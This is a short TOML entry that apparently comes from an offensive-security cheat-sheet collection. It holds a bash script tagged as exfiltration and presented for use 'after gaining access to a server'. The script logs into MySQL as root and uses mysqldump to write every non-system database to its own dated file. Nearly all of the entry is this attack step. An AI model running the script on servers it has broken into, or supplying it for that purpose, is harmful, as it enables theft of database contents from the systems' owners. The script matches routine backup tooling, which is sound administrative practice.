title = "Dump all MySQL databases separately"
description = "Extract each MySQL database to a separate file"
tags = ["linux", "MySQL", "bash", "exfiltration"]
source = []

[[data]]
description = "After gaining access to a server running MySQL, use this script to dump all its databases into separate files."
language = "bash"
command = """#!/bin/bash
USER="root"
PASSWORD=""

databases=`mysql -u $USER -p$PASSWORD -e "SHOW DATABASES;" | tr -d "| " | grep -v Database`

for db in $databases; do
    if [[ "$db" != "information_schema" ]] && [[ "$db" != "performance_schema" ]] && [[ "$db" != "mysql" ]] && [[ "$db" != _* ]] ; then
        echo "Dumping database: $db"
        mysqldump -u $USER -p$PASSWORD --databases $db > `date +%Y%m%d`.$db.sql
    fi
done
"""